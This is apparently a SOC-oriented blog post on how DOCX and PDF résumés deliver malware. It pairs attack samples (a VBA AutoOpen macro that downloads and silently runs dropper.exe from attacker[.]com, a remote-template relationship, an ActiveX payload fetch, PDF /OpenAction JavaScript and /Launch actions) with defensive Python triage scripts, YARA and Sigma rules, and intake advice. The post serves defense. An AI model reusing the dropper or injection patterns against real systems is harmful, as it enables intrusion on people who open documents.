In a recent application process, I ran into a frustratingly common situation: a company refused to accept .docx uploads due to “security concerns”… but was happy to accept .pdf files instead. Seems smart, right?
It’s not. Let’s break down why both file types have real, exploitable risks — and show exactly how attackers use each to deliver malware — with code, payload examples, and CVE breakdowns.

⚠️ DOCX Files: Dangerous Doesn’t Always Mean Obvious
DOCX is often treated as the “safe” alternative to macro-enabled formats like .docm. That’s a dangerous assumption. While .docx is designed to exclude VBA macro support, attackers have repeatedly found ways to sneak malicious code into these files — and Microsoft confirms that macro viruses can spread through infected Word documents, including .docx.
- 📎 Macro Viruses DO Affect DOCX: Microsoft classifies macro viruses as spreading through Word docs. Macros can be embedded via templates or malformed structures, and even .docx can be coerced into executing them.
- 🧩 Remote Template Injection: A .docx can include a reference to a remote template that contains malicious macros. Example:
```xml
<Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://attacker[.]com/template.dotm"
    TargetMode="External"/>
```
When the DOCX is opened, Word attempts to load the external .dotm template. If macros are enabled or user trust is abused, the macro executes.
- 🪓 CVE Example: CVE-2021-40444 – Malicious ActiveX control embedded via crafted XML in a DOCX preview triggered RCE:
```html
<object classid='clsid:...BAD-CLSID...'>
    <param name="URL" value="http://attacker[.]com/payload.cab">
</object>
```
This vulnerability allowed attackers to execute arbitrary code just by previewing a malicious DOCX file in Windows Explorer — no macro needed.
- 🧨 VBA Macro Payload Sample: Classic malicious macro using VBA to drop a file:
```vba
Sub AutoOpen()
    Dim strUrl As String
    strUrl = "http://attacker[.]com/dropper.exe"
    With CreateObject("Microsoft.XMLHTTP")
        .Open "GET", strUrl, False
        .Send
        If .Status = 200 Then
            Dim objStream
            Set objStream = CreateObject("ADODB.Stream")
            objStream.Open
            objStream.Type = 1
            objStream.Write .responseBody
            objStream.SaveToFile "C:\\Users\\Public\\dropper.exe", 2
            objStream.Close
        End If
    End With
    Shell "C:\\Users\\Public\\dropper.exe", vbHide
End Sub
```
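The remote template relationship shown above is something a defender can check for statically before a file ever reaches HR. The following is an added example (not code from the original post): it opens a DOCX as the ZIP container it is, walks every `*.rels` part for an `attachedTemplate` relationship whose `TargetMode` is `External`, and also reports a bundled `vbaProject.bin`, which a true `.docx` should never contain. The `build_sample` helper constructs a minimal docx-like ZIP in memory so the check runs offline; the template host in it is a placeholder, not a real indicator.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                 "relationships/attachedTemplate")


def triage_docx(data: bytes) -> dict:
    """Report external attachedTemplate relationships and any bundled VBA project."""
    findings = {"external_templates": [], "has_vba_project": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # A .docx should never ship word/vbaProject.bin; its presence is a red flag.
        findings["has_vba_project"] = any(
            n.lower().endswith("vbaproject.bin") for n in names)
        # Walk every relationships part; the attached template normally lives
        # in word/_rels/settings.xml.rels, but checking all *.rels is cheap.
        for name in names:
            if not name.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if (rel.get("Type") == TEMPLATE_TYPE
                        and rel.get("TargetMode", "Internal") == "External"):
                    findings["external_templates"].append((name, rel.get("Target")))
    return findings


def build_sample(template_target: str = "") -> bytes:
    """Construct a minimal docx-like zip for testing (constructed input, not a real file)."""
    rels = f'<Relationships xmlns="{REL_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{TEMPLATE_TYPE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host, not a real indicator.
    print(triage_docx(build_sample("http://template-host.example/template.dotm")))
    print(triage_docx(build_sample()))
```

Any non-empty `external_templates` list is worth blocking at intake, since a legitimate resume has no reason to pull a template from the internet.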

🧨 PDF Files: More Than Meets the Eye
PDF is not a static format. It’s scriptable and programmable — and that’s why it’s dangerous.
- 🦠 JavaScript Execution via /OpenAction: Many malicious PDFs include JavaScript triggers. Example:
```text
/OpenAction <<
    /S /JavaScript /JS (app.alert("Your system is infected. Download cleaner now!"))
>>
```
- 🔗 Embedded Executables: PDFs may include EXEs or scripts using the /Launch action:
```text
/Launch <<
    /F (evil.exe)
    /D (C:\\Temp)
    /O (open)
    /S
>>
```
- 🔬 CVE-2018-4990: Used malformed compressed streams to trigger RCE via heap corruption in Adobe Reader.
- 🧪 pdfid + pdf-parser Output Example:
```text
$ pdfid.py suspicious.pdf
/JavaScript 1
/OpenAction 1
/Launch 1
$ pdf-parser.py suspicious.pdf --search JavaScript
obj 10 0
<<
/S /JavaScript
/JS (this.exportDataObject({ cName: "evil.exe", nLaunch: 2 });)
>>
```
This kind of PDF delivers malware even if it’s disguised as a “secure” form or invoice.
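The pdfid output above is a keyword count over the raw file. The following added example (not from the original post) does the same triage in a few lines and handles one detail a plain `grep` misses: PDF names may be hex-escaped, so `/#4Aava#53cript` is the same name as `/JavaScript`. The two PDFs in it are constructed samples; like pdfid, this only sees names in cleartext, so anything inside compressed object streams needs pdf-parser or a full parser.

```python
import re

# Keywords pdfid reports that matter for the triggers discussed above.
KEYWORDS = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile")
# A PDF name object: a slash followed by regular characters (delimiters end it).
NAME_RE = re.compile(rb"/[^\s/<>\[\]()%{}]+")


def normalise_name(raw: bytes) -> bytes:
    """Decode #xx hex escapes in a name, so /#4Aava#53cript becomes /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw)


def keyword_counts(pdf: bytes) -> dict:
    """Count each keyword over the cleartext of the file, like pdfid does.
    Names hidden inside compressed object streams are not visible here."""
    counts = {k: 0 for k in KEYWORDS}
    for m in NAME_RE.finditer(pdf):
        name = normalise_name(m.group(0)).decode("latin-1")
        if name in counts:
            counts[name] += 1
    return counts


def is_suspicious(counts: dict) -> bool:
    """Auto-trigger (/OpenAction, /AA) combined with script or launch content."""
    trigger = counts["/OpenAction"] or counts["/AA"]
    payload = counts["/JavaScript"] or counts["/JS"] or counts["/Launch"]
    return bool(trigger and payload)


# Constructed sample: OpenAction pointing at a hex-escaped JavaScript action.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /#4Aava#53cript /JS (app.alert("constructed sample")) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("clean", CLEAN_PDF)):
        c = keyword_counts(doc)
        print(label, {k: v for k, v in c.items() if v}, "suspicious:", is_suspicious(c))
```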
🎯 Real-World SOC Scenario: Resume Dropper Malware
Picture this: your company posts a job opening. Within hours, your HR inbox or web portal is flooded with 500+ applications. But a few of them aren’t just resumes — they’re delivery mechanisms.
Attackers embed malware in DOCX or PDF files to compromise the endpoint that opens the resume — typically HR, hiring managers, or even security analysts in hybrid review roles. This is a classic initial access vector used in phishing, BEC staging, and red team campaigns.
🛠️ What Can SOC Analysts Do?
- 🚩 Flag large surges in resume uploads from unauthenticated or guest sessions
- 🔬 Perform auto-extraction of document metadata and scan attachments with YARA + sandbox detonation
- 📥 Create EDR watchlists for suspicious behaviors linked to office or PDF processing
- 🧰 Monitor for outbound requests to domains linked via embedded templates, JS, or macros
🧾 YARA Rule: Detect Malicious Resume Macros
```yara
rule Malicious_Macro_Resume
{
    meta:
        description = "Detects suspicious macros in resume-themed DOCX files"
        author = "SOCDFIR Blog"
        reference = "CVE-2021-40444, macro malware delivery"
    strings:
        $a = "AutoOpen"
        $b = "CreateObject"
        $c = "ADODB.Stream"
        $d = /http[s]?:\/\/[^\s]{10,100}/
        $e = "Shell"
    condition:
        // ZIP signature "PK" is bytes 50 4B; uint16() reads little-endian,
        // so the big-endian reader is needed for 0x504B to match
        uint16be(0) == 0x504B and 3 of ($a,$b,$c,$d,$e)
}
```
💡 Use this YARA rule in document scanning pipelines, or on macro code extracted from the `vbaProject.bin` part inside .docx/.docm files. Note that the magic-number clause only matches files that begin with the ZIP signature, and that the VBA source inside `vbaProject.bin` is stored compressed, so the string patterns will not match the raw container; to scan extracted macro source (for example olevba output), drop the magic-number clause and apply the string conditions on their own.
⚡ Sigma Rule: Malicious Office Execution
```yaml
title: Office App Launches External Script or Executable
id: socdfir-office-launch-exec
description: Detects Office processes spawning suspicious commands, often tied to macro malware
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|contains:
      - 'WINWORD.EXE'
      - 'EXCEL.EXE'
      - 'POWERPNT.EXE'
    Image|endswith:
      - 'cmd.exe'
      - 'powershell.exe'
      - 'wscript.exe'
      - 'mshta.exe'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059
```
🧠 Tune this Sigma rule to alert when Office spawns unusual child processes — a red flag that a resume was more than just a resume.
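To see what the selection above actually fires on, here is an added example (not from the original post) that applies the same parent/child logic to a handful of constructed Sysmon-style process-creation events. Sigma's `contains` and `endswith` modifiers are case-insensitive, so the comparison lowercases both sides; the benign Word child process and the non-Office parent stay quiet.

```python
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
SUSPICIOUS_CHILDREN = ("cmd.exe", "powershell.exe", "wscript.exe", "mshta.exe")


def matches_office_launch(event: dict) -> bool:
    """Sigma's |contains and |endswith modifiers are case-insensitive,
    so both sides are lowercased before comparison."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    return (any(p in parent for p in OFFICE_PARENTS)
            and any(image.endswith(c) for c in SUSPICIOUS_CHILDREN))


def alerts(events: list) -> list:
    """Return the events that would fire the rule."""
    return [e for e in events if matches_office_launch(e)]


# Constructed Sysmon-style process-creation events (not real telemetry).
EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"id": 2, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe"},          # print helper, benign
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},       # not an Office parent
    {"id": 4, "ParentImage": r"c:\program files\microsoft office\root\office16\excel.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe"},  # case differs
]

if __name__ == "__main__":
    for e in alerts(EVENTS):
        print("ALERT", e["id"], e["ParentImage"], "->", e["Image"])
```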
🧭 SOC Workflow: Resume File Intake Hardening
- 🚪 Build a sandboxed submission portal for resume intake
- 📤 Strip/flatten document content before internal distribution (CDR, safe HTML conversion)
- 🧾 Store resumes as base64-encoded files until post-scan release
- 💬 Add alert context for HR in ticketing: “File originated from external applicant upload. Open in viewer only.”
- 🔄 Forward suspicious attachments for dynamic analysis (e.g., Cuckoo, Joe Sandbox)
Most importantly, train SOC Tier 1 staff to review resume files like any other attachment in a phishing campaign. The payload doesn’t care whether it came from a fake invoice or a fake job seeker.
🔐 Final Thoughts
DOCX and PDF files are not safe. They are common — which is why attackers love them. If you’re going to ban one, you’d better understand the risks of the other. Better yet, design your upload process around file behavior, not extension.
Want secure resumes? Accept plaintext, markdown, or properly disarmed formats — and make that clear on your site. Don’t rely on myths.